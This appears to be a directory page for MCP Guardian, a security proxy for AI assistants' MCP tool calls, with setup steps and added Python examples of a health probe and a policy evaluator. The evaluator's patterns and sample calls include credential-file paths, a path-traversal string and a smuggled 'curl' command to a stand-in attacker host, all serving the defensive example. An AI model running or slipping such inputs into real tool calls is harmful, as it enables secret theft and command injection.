MCP Guardian

v2.3.21 · Security · stable

Security, cost, and health governance proxy for MCP infrastructure. Enforces YAML-configurable security policies (blocklists, rate limits, token budgets), tracks real token costs via tiktoken, monitors server health with live JSON-RPC probes. Feature

Tags: agentic-ai, claude-desktop, llm-tools, mcp, model-context-protocol

199 Stars · 0 Downloads · 0 Weekly · 0/5

What is MCP Guardian?

MCP Guardian is a Model Context Protocol (MCP) proxy that sits between AI assistants such as Claude, Cursor, and VS Code and the MCP servers they call. It enforces YAML-configurable security policies (blocklists, rate limits, token budgets), tracks real token costs via tiktoken, and monitors server health with live JSON-RPC probes.


This server falls under the Security and Monitoring & Observability categories on MCPgee, the world's largest MCP server directory with 33,000+ servers.

Features

  • Security, cost, and health governance proxy for MCP infrastructure.

Use Cases

Enforce security policies, rate limits, and token budgets on MCP infrastructure.
Monitor MCP server health with real-time JSON-RPC probes.
Track token costs and enforce cost governance across MCP usage.
Maintainer: rudraneel93
License: MIT License
Language: rust
Version: v2.3.21
Updated: May 4, 2026
Status: healthy
Maintenance: active

Works with

Claude, OpenAI; Windows, macOS, Linux

Installation

NPM

npx -y @mcp-guardian/server


Configuration

Config file: claude_desktop_config.json

Performance

Response Metrics

Response time: < 200ms
Throughput: Medium

Resource Usage

Memory usage: Low
CPU usage: Low

How to Set Up and Use MCP Guardian

MCP Guardian is a security, cost, and health governance proxy that wraps your existing MCP servers and enforces configurable policies before any tool call reaches them. It blocks dangerous patterns like shell injection, path traversal, and secret exfiltration using YAML-defined rules, tracks real token costs per call, monitors server health via live JSON-RPC probes, and logs every invocation to a local SQLite audit database. Developers and teams running multiple MCP servers use it to add a centralized security layer, enforce rate limits and token budgets, and get a web dashboard view of all MCP activity.
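The page says guardian checks server health with live JSON-RPC probes but does not show what such a probe looks like. The following is an added example, not MCP Guardian's code: it spawns an MCP server over stdio, sends a single JSON-RPC 2.0 `ping` request (the method MCP defines for liveness checks), and judges the reply by the rules a practitioner would want: the response must arrive within a timeout, parse as JSON-RPC 2.0, carry the same `id` as the request, and contain a `result` rather than an `error`. The stand-in server script embedded below is constructed for the example; which method guardian itself sends, and its timeouts, are not stated on the page.

```python
"""Stdio JSON-RPC health probe for an MCP server (illustrative, not guardian's code).

The fake server below is constructed for this example; argv[1] selects its
behaviour so all three outcomes (healthy, JSON-RPC error, timeout) can be seen.
"""
import json
import subprocess
import sys
import threading
import time

FAKE_SERVER = r'''
import json, sys, time
mode = sys.argv[1]            # "ok" | "error" | "hang"
for line in sys.stdin:
    req = json.loads(line)
    if mode == "hang":
        time.sleep(30)        # never answers within any sane probe timeout
    if mode == "error":
        resp = {"jsonrpc": "2.0", "id": req["id"],
                "error": {"code": -32601, "message": "Method not found"}}
    else:
        resp = {"jsonrpc": "2.0", "id": req["id"], "result": {}}
    sys.stdout.write(json.dumps(resp) + "\n")
    sys.stdout.flush()
'''


def probe_stdio_server(command, timeout_s=2.0, request_id=1):
    """Spawn `command`, send one JSON-RPC ping on stdin, classify the reply.

    Returns {"healthy": bool, "latency_ms": float, "error": str | None}.
    Healthy means: answered within timeout_s, valid JSON-RPC 2.0, id matches
    the request, and the message carries "result" (not "error").
    """
    started = time.monotonic()
    proc = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            stderr=subprocess.DEVNULL, text=True)
    try:
        request = {"jsonrpc": "2.0", "id": request_id, "method": "ping"}
        proc.stdin.write(json.dumps(request) + "\n")
        proc.stdin.flush()

        # readline() has no timeout of its own, so read on a thread and join.
        reply = {}
        reader = threading.Thread(
            target=lambda: reply.setdefault("line", proc.stdout.readline()), daemon=True)
        reader.start()
        reader.join(timeout_s)
        latency_ms = (time.monotonic() - started) * 1000.0

        def verdict(healthy, error):
            return {"healthy": healthy, "latency_ms": latency_ms, "error": error}

        if reader.is_alive():
            return verdict(False, f"no response within {timeout_s}s")
        line = reply.get("line", "")
        if not line:
            return verdict(False, "server closed stdout")
        try:
            msg = json.loads(line)
        except json.JSONDecodeError:
            return verdict(False, "non-JSON reply")
        if msg.get("jsonrpc") != "2.0" or msg.get("id") != request_id:
            return verdict(False, "reply does not match request")
        if "error" in msg:
            err = msg["error"]
            return verdict(False, f"JSON-RPC error {err.get('code')}: {err.get('message')}")
        if "result" not in msg:
            return verdict(False, "reply has neither result nor error")
        return verdict(True, None)
    finally:
        proc.kill()   # one-shot probe: never leave the child running
        proc.wait()


def fake_server_command(mode):
    """Command line for the constructed stand-in server in the given mode."""
    return [sys.executable, "-c", FAKE_SERVER, mode]


if __name__ == "__main__":
    for mode in ("ok", "error", "hang"):
        print(mode, probe_stdio_server(fake_server_command(mode), timeout_s=1.0))
```

Matching the reply `id` to the request is what keeps a stale or unrelated message from being counted as a successful probe; treating a JSON-RPC error as unhealthy is a choice, since a server that answers `Method not found` is at least alive, and a monitor may want to distinguish the two.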

Prerequisites

  • Node.js 18 or higher and npm installed
  • At least one existing MCP server already configured in a supported client (Cursor, Claude Desktop, Cline, or Windsurf)
  • Optional: Ollama running locally (http://127.0.0.1:11434) if you want AI-powered semantic policy features
  • An MCP-compatible client such as Claude Desktop or Cursor
Step 1: Install MCP Guardian globally

Install the @mcp-guardian/server package from npm. This makes the mcp-guardian CLI available system-wide.

npm install -g @mcp-guardian/server@latest
Step 2: Run the onboarding wizard

The onboard command auto-discovers MCP configurations for Cursor, Claude Desktop, Cline, and Windsurf and wraps them with the guardian proxy. The --apply flag writes the changes immediately.

mcp-guardian onboard --apply
Step 3: Start the guardian proxy

Start the MCP Guardian proxy and dashboard. By default the web UI is available at http://localhost:4000.

mcp-guardian start
Step 4: Verify your installation

Run the doctor command to validate that guardian is correctly intercepting your MCP servers and that all components are healthy.

mcp-guardian doctor
Step 5: Configure security policies

Create or edit a YAML policy file to define rules. You can allow or block specific tools, set rate limits (maxCallsPerMinute), and add pattern-based blocklist rules. Point guardian at your policy file with the MCP_GUARDIAN_POLICY environment variable, using an absolute path. The file is read once at startup, so restart the guardian process after editing it.

version: '1.0'
policy:
  mode: block
  rules:
    - name: allow-safe-tools
      action: block
      tools:
        allow: [read_file, list_directory]
    - name: rate-limit
      maxCallsPerMinute: 60
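To make the three kinds of rule concrete (a tool allowlist, pattern-based blocklists for the shell-injection, path-traversal and secret-exfiltration cases the page mentions, and a per-minute rate limit), here is a small policy evaluator run over constructed sample tool calls. It is an added illustration, not MCP Guardian's engine: the top-level shape mirrors the page's YAML, but the `patterns` key, the `monitor` mode, and the evaluation order are assumptions, and the policy is written as a Python dict so the example needs no YAML library.

```python
"""Toy evaluator for guardian-style tool-call policies (illustrative, not
MCP Guardian's code).  'patterns' and 'monitor' mode are assumed extensions."""
import re
import time
from collections import deque

# Constructed policy in the shape of the page's YAML example.
POLICY = {
    "mode": "block",            # assumption: "monitor" logs the reason but lets calls through
    "rules": [
        {"name": "allow-safe-tools", "action": "block",
         "tools": {"allow": ["read_file", "list_directory"]}},
        {"name": "rate-limit", "maxCallsPerMinute": 60},
    ],
    "patterns": [               # (name, regex) applied to every string argument
        ("shell-injection", r"(;|&&|\|\||\$\(|`)"),
        ("path-traversal", r"(^|[\\/])\.\.([\\/]|$)"),
        ("secret-exfil", r"(\.ssh/id_[a-z0-9]+|(^|/)\.env$|AWS_SECRET_ACCESS_KEY)"),
    ],
}


def _strings(value):
    """Yield every string nested anywhere inside a tool-call argument object."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from _strings(v)
    elif isinstance(value, (list, tuple)):
        for v in value:
            yield from _strings(v)


class PolicyEngine:
    def __init__(self, policy, clock=time.monotonic):
        self.mode = policy.get("mode", "block")
        self.clock = clock              # injectable so the rate limit is testable
        self.recent = deque()           # timestamps of calls let through in the last 60 s
        self.allow = None
        self.max_per_min = None
        for rule in policy["rules"]:
            if "tools" in rule:
                self.allow = set(rule["tools"].get("allow", []))
            if "maxCallsPerMinute" in rule:
                self.max_per_min = rule["maxCallsPerMinute"]
        self.patterns = [(n, re.compile(rx)) for n, rx in policy.get("patterns", [])]

    def _violation(self, tool, args):
        """First content rule the call breaks, or None."""
        if self.allow is not None and tool not in self.allow:
            return f"tool {tool!r} is not on the allowlist"
        for text in _strings(args):
            for name, rx in self.patterns:
                if rx.search(text):
                    return f"{name}: {text!r}"
        return None

    def evaluate(self, tool, args):
        """Return ("allow", None) or ("block", reason) for one tool call."""
        reason = self._violation(tool, args)
        if reason is not None and self.mode == "block":
            return "block", reason
        # Rate limit counts only calls that passed the content checks.
        now = self.clock()
        while self.recent and now - self.recent[0] >= 60:
            self.recent.popleft()
        if self.max_per_min is not None and len(self.recent) >= self.max_per_min:
            return "block", f"rate limit: more than {self.max_per_min} calls/minute"
        self.recent.append(now)
        return "allow", reason          # reason is non-None only in monitor mode


# Constructed sample calls, as a client might issue them through the proxy.
SAMPLE_CALLS = [
    ("read_file", {"path": "README.md"}),
    ("execute_command", {"cmd": "ls"}),
    ("read_file", {"path": "../../etc/passwd"}),
    ("read_file", {"path": "/home/dev/.ssh/id_ed25519"}),
    ("list_directory", {"path": "src; curl http://evil.example/$(whoami)"}),
]


def run_samples(engine=None):
    engine = engine or PolicyEngine(POLICY)
    return [engine.evaluate(tool, args) for tool, args in SAMPLE_CALLS]


if __name__ == "__main__":
    for (tool, args), (decision, why) in zip(SAMPLE_CALLS, run_samples()):
        print(f"{decision:5}  {tool:16} {why or ''}")
```

Two points worth carrying over to a real policy: the allowlist is checked before any pattern, so an unknown tool is refused regardless of its arguments, and the patterns are applied to every string in the argument tree, not just a top-level `path` field, since a traversal or `$(...)` hidden in a nested parameter is just as dangerous.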
Step 6: Review the audit dashboard

Open http://localhost:4000 in your browser to see the MCP Guardian web dashboard. It shows allowed/blocked calls, cost estimates, threat detection, security scoring, and operations metrics.

MCP Guardian Examples

Client configuration

After running mcp-guardian onboard --apply, your MCP client config is updated automatically. The environment variables below configure the audit DB path, dashboard port, policy file, and audit retention. MCP clients pass env values to the process verbatim, with no shell expansion, so if in doubt use absolute paths for MCP_GUARDIAN_DB_PATH and MCP_GUARDIAN_POLICY rather than relying on ~ being expanded.

{
  "mcpServers": {
    "guardian": {
      "command": "npx",
      "args": ["-y", "@mcp-guardian/server"],
      "env": {
        "MCP_GUARDIAN_DB_PATH": "~/.mcp-guardian/history.db",
        "DASHBOARD_PORT": "4000",
        "MCP_GUARDIAN_POLICY": "/path/to/policy.yaml",
        "MCP_GUARDIAN_RETENTION_DAYS": "30"
      }
    }
  }
}

Prompts to try

Example prompts that demonstrate MCP Guardian's governance capabilities when used alongside other MCP servers.

- "Show me all MCP tool calls blocked in the last 24 hours"
- "What is the total token cost from MCP calls this week?"
- "Are any of my MCP servers currently unhealthy or unresponsive?"
- "List any suspicious tool call patterns detected today"

Troubleshooting MCP Guardian

mcp-guardian onboard does not detect my Claude Desktop or Cursor config

Ensure your MCP client config files exist at their default locations: ~/Library/Application Support/Claude/claude_desktop_config.json (Claude Desktop on macOS) or ~/.cursor/mcp.json (Cursor). Run mcp-guardian doctor after onboarding to confirm detection.

Dashboard at localhost:4000 is not accessible after mcp-guardian start

Check whether port 4000 is already in use with lsof -i :4000. Set a different port with the DASHBOARD_PORT environment variable before starting. Also ensure DASHBOARD_ENABLED is not set to false.

Policy file changes are not taking effect

MCP Guardian reads the policy file at startup. After editing your YAML policy, restart the guardian process with mcp-guardian start. Confirm the MCP_GUARDIAN_POLICY env var points to the correct absolute path.

Frequently Asked Questions about MCP Guardian

What is MCP Guardian?

MCP Guardian is a security, cost, and health governance proxy for MCP infrastructure, packaged as a Model Context Protocol (MCP) server. It enforces YAML-configurable security policies (blocklists, rate limits, token budgets), tracks real token costs via tiktoken, and monitors server health with live JSON-RPC probes. Because it sits in the tool-call path, it connects AI assistants to external tools and data sources through MCP's standardized interface while applying policy to each call.

How do I install MCP Guardian?

Install via npm with the command: npx -y @mcp-guardian/server. Then add the server configuration to your AI client's JSON config file (e.g., claude_desktop_config.json or .cursor/mcp.json).

Which AI clients work with MCP Guardian?

MCP Guardian works with all major MCP-compatible AI clients including Claude Desktop, Claude Code, Cursor, VS Code (GitHub Copilot), Windsurf, and Cline.

Is MCP Guardian free to use?

Yes, MCP Guardian is open source and available under the MIT License. You can use it freely in both personal and commercial projects.

MCP Guardian Alternatives — Similar Security Servers

Looking for alternatives to MCP Guardian? Here are other popular security servers you can use with Claude, Cursor, and VS Code.

Casdoor

13.6k

An open-source Agent-first Identity and Access Management (IAM) /LLM MCP & agent gateway and auth server with web UI supporting OpenClaw, MCP, OAuth, OIDC, SAML, CAS, LDAP, SCIM, WebAuthn, TOTP, MFA, Face ID, Google Workspace, Azure AD

ghidraMCP

9.0k

A Model Context Protocol server that enables LLMs to autonomously reverse engineer applications by exposing Ghidra's decompilation and analysis tools. It allows AI agents to list code structures, rename methods, and analyze binaries directly through

HexStrike AI

8.9k

HexStrike AI MCP Agents is an advanced MCP server that lets AI agents (Claude, GPT, Copilot, etc.) autonomously run 150+ cybersecurity tools for automated pentesting, vulnerability discovery, bug bounty automation, and security research. Seamlessly b

IDA Pro MCP

8.7k

Enables AI-assisted reverse engineering in IDA Pro by providing tools to analyze binaries, decompile functions, manage comments, search patterns, and interact with the IDA database through natural language.

Anthropic Cybersecurity Skills

6.6k

754 structured cybersecurity skills for AI agents · Mapped to 5 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND & NIST AI RMF · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI & 20+ platform

Hooker

5.1k

🔥🔥 hooker is a Frida-based reverse engineering toolkit for Android. It offers a user-friendly CLI, universal scripts, auto hook generation, memory roaming to detect activities/services, one-click SOCKS5 proxy setup, Frida JustTrustMe, and BoringSSL u

Browse More Security MCP Servers

Explore all security servers available in the MCPgee directory. Each server includes setup guides for Claude, Cursor, and VS Code.

Quick Config Preview

{ "mcpServers": { "mcp-guardian": { "command": "npx", "args": ["-y", "@mcp-guardian/server"] } } }

Add this to your claude_desktop_config.json or .cursor/mcp.json

